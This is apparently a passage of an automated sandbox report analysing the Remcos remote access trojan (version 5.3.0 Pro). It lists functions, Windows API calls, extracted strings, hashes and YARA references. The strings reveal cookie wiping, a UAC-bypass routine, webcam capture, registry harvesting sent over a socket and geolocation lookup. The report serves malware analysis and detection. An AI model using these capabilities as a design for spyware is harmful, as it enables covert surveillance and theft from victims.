                                                    • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                                    • Opcode Fuzzy Hash: 540239c3c7a8b78e424bcf486381df198cb5d8aead86a72beee1c9aef6a9193c
                                                    • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                                    Function 0044F816 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                    • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                    • Opcode Fuzzy Hash: 6141bfdb7684140d9b9f029a8ead33158da868342510b0366010e9dcd8c93941
                                                    • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                    Function 00401768 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExitThread.KERNEL32 ref: 004017F4
                                                      • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                      • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                      • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                    • __Init_thread_footer.LIBCMT ref: 004017BC
                                                      • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                      • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                    • String ID: T=G$>G$>G
                                                    • API String ID: 1596592924-1617985637
                                                    • Opcode ID: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
                                                    • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                    • Opcode Fuzzy Hash: 88022268fe3ca53b7ee126a34617c6b967d0ef3f346763fa63774eaa4140af22
                                                    • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                    Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                      • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                      • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEnumInfoOpenQuerysend
                                                    • String ID: TUFTUF$>G$DG$DG
                                                    • API String ID: 3114080316-344394840
                                                    • Opcode ID: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
                                                    • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                    • Opcode Fuzzy Hash: de4befe685273e7bf067e3fe47780df676ebf89a32a955f1e6b39ea8039125ff
                                                    • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                    Function 004430A8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID: Zb1Y/
                                                    • API String ID: 269201875-3232713500
                                                    • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                    • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                                    • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                    • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                                    Function 0044FEE3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63), ref: 0044FF30
                                                    • __alloca_probe_16.LIBCMT ref: 0044FF68
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE63,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?), ref: 0044FFB9
                                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE63,0042CE63,?,00000002,?), ref: 0044FFCB
                                                    • __freea.LIBCMT ref: 0044FFD4
                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434433,?,?,00437237,?,?,00000000,00475B90,?,0040CC87,00434433,?,?,?,?), ref: 00446B41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                    • String ID: Zb1Y/
                                                    • API String ID: 313313983-3232713500
                                                    • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                    • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                                    • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                    • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                                    Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00412513: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                      • Part of subcall function 00412513: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                      • Part of subcall function 00412513: RegCloseKey.ADVAPI32(?), ref: 0041255F
                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                    • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                    • API String ID: 1133728706-4073444585
                                                    • Opcode ID: 5effe5f51f8f21a7ca216989d95178152c4d72b0edc7930c67b4db85c6a4f163
                                                    • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                                    • Opcode Fuzzy Hash: 5effe5f51f8f21a7ca216989d95178152c4d72b0edc7930c67b4db85c6a4f163
                                                    • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                                    Function 00455913 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                    • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                                                    • Opcode Fuzzy Hash: a689da314200d05c27aed096e5791327431372d8d81dee2cdc260883e4ab0459
                                                    • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                                                    Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                    • int.LIBCPMT ref: 0040FC0F
                                                      • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                      • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                    • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                    • String ID: p[G
                                                    • API String ID: 2536120697-440918510
                                                    • Opcode ID: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
                                                    • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                                                    • Opcode Fuzzy Hash: 34d2c97419ff9ea43b4d99934c17e21ff42c81eb248cc24d2bbad1ad966fea40
                                                    • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                                                    Function 0041A52B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                    • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                    • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                    Strings
                                                    • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleOpen$FileRead
                                                    • String ID: http://geoplugin.net/json.gp
                                                    • API String ID: 3121278467-91888290
                                                    • Opcode ID: ecc14aede82b46fb49e4f7f43219cd01aef67952e47ba0d6f05c0bfa16f60169
                                                    • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                                    • Opcode Fuzzy Hash: ecc14aede82b46fb49e4f7f43219cd01aef67952e47ba0d6f05c0bfa16f60169
                                                    • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                                                    Function 0044FCEB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                                                    • _free.LIBCMT ref: 0044FD39
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    • _free.LIBCMT ref: 0044FD44
                                                    • _free.LIBCMT ref: 0044FD4F
                                                    • _free.LIBCMT ref: 0044FDA3
                                                    • _free.LIBCMT ref: 0044FDAE
                                                    • _free.LIBCMT ref: 0044FDB9
                                                    • _free.LIBCMT ref: 0044FDC4
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                    • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                                                    • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                    • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                                                    Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\eaJOpx.exe), ref: 00406835
                                                      • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                      • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                    • CoUninitialize.OLE32 ref: 0040688E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InitializeObjectUninitialize_wcslen
                                                    • String ID: C:\Users\user\AppData\Roaming\eaJOpx.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                    • API String ID: 3851391207-892239983
                                                    • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                    • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                    • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                                                    • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                    Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                    • int.LIBCPMT ref: 0040FEF2
                                                      • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                      • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                    • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                    • String ID: h]G
                                                    • API String ID: 2536120697-1579725984
                                                    • Opcode ID: f9aa0e65a7bbfdd7a7f79a788d404fc3f4b750e419fadc6b529989e89958da83
                                                    • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                                                    • Opcode Fuzzy Hash: f9aa0e65a7bbfdd7a7f79a788d404fc3f4b750e419fadc6b529989e89958da83
                                                    • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                                                    Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                    • GetLastError.KERNEL32 ref: 0040B2EE
                                                    Strings
                                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                    • UserProfile, xrefs: 0040B2B4
                                                    • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                    • [Chrome Cookies not found], xrefs: 0040B308
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteErrorFileLast
                                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                    • API String ID: 2018770650-304995407
                                                    • Opcode ID: f29ab34f5f3b23139b2c689574f5439d44e644a4acc68cd0207f5b0faff05a8e
                                                    • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                                                    • Opcode Fuzzy Hash: f29ab34f5f3b23139b2c689574f5439d44e644a4acc68cd0207f5b0faff05a8e
                                                    • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                                                    Function 0041BEC0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Console$AllocOutputShowWindow
                                                    • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                    • API String ID: 2425139147-2527699604
                                                    • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                    • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                                    • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                    • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                                    Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (CG$C:\Users\user\AppData\Roaming\eaJOpx.exe$BG
                                                    • API String ID: 0-86119462
                                                    • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                    • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                    • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                    • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                    Function 004425E9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 0044263F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$Zb1Y/$mscoree.dll
                                                    • API String ID: 4061214504-1314272428
                                                    • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                    • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                                                    • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                    • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                                                    Function 0043960C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __allrem.LIBCMT ref: 00439799
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                                                    • __allrem.LIBCMT ref: 004397CC
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                                                    • __allrem.LIBCMT ref: 00439801
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 1992179935-0
                                                    • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                    • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                                                    • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                    • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                                                    Function 00444B4D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __cftoe
                                                    • String ID:
                                                    • API String ID: 4189289331-0
                                                    • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                    • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                                                    • Opcode Fuzzy Hash: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                    • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                                                    Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                      • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prologSleep
                                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                    • API String ID: 3469354165-462540288
                                                    • Opcode ID: d646cc94dd29014b6374a2a4e60195283c2f178935aee79a729c44775ae57c63
                                                    • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                                                    • Opcode Fuzzy Hash: d646cc94dd29014b6374a2a4e60195283c2f178935aee79a729c44775ae57c63
                                                    • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                                                    Function 00419DFC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                    • String ID:
                                                    • API String ID: 493672254-0
                                                    • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                    • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
